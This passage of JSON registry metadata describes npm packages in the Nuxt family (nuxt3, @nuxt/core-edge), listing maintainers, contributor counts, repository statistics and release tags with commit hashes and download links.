lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt3/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt3/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt3/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt3/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt3/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt3/codemeta","maintainers":[{"uuid":"nuxt.bot","login":"nuxt.bot","name":null,"email":"pyapar+nuxtbot@gmail.com","url":null,"packages_count":22,"html_url":"https://www.npmjs.com/~nuxt.bot","role":null,"created_at":"2022-11-10T13:50:48.136Z","updated_at":"2022-11-10T13:50:48.136Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxt.bot/packages"},{"uuid":"pi0","login":"pi0","name":null,"email":"pyapar@gmail.com","url":null,"packages_count":689,"html_url":"https://www.npmjs.com/~pi0","role":null,"created_at":"2022-11-10T13:50:47.280Z","updated_at":"2022-11-10T13:50:47.280Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/pi0/packages"},{"uuid":"atinux","login":"atinux","name":null,"email":"atinux@gmail.com","url":null,"packages_count":378,"html_url":"https://www.npmjs.com/~atinux","role":null,"created_at":"2022-11-10T13:50:46.272Z","updated_at":"2022-11-10T13:50:46.272Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/atinux/packages"},{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2022-11-10T13:50:50.109Z","updated_at":"2022-11-10T13:50:50.109Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2025-02-13T20:50:13.128Z","updated_at":"2025-02-13T20:50:13.128Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096087,"name":"@nuxt/core-edge","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":1842,"first_release_published_at":"2018-10-17T22:29:20.729Z","latest_release_published_at":"2020-06-29T00:22:50.925Z","latest_release_number":"3.0.0-26556502.75dd90f2","last_synced_at":"2026-05-11T01:23:15.294Z","created_at":"2022-04-08T10:39:22.923Z","updated_at":"2026-05-11T01:23:15.295Z","registry_url":"https://www.npmjs.com/package/@nuxt/core-edge","install_command":"npm install @nuxt/core-edge","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"next":"3.0.0-26556502.75dd90f2","latest":"2.18.2-28661769.e265ef3"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2023-12-19T00:39:48.000Z","size":110320,"stargazers_count":49067,"open_issues_count":998,"forks_count":4604,"subscribers_count":782,"default_branch":"main","last_synced_at":"2023-12-19T08:47:20.125Z","etag":null,"topics":["csr","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-03-18T22:20:10.502Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":null,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":221370872,"owners_count":16806934,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https: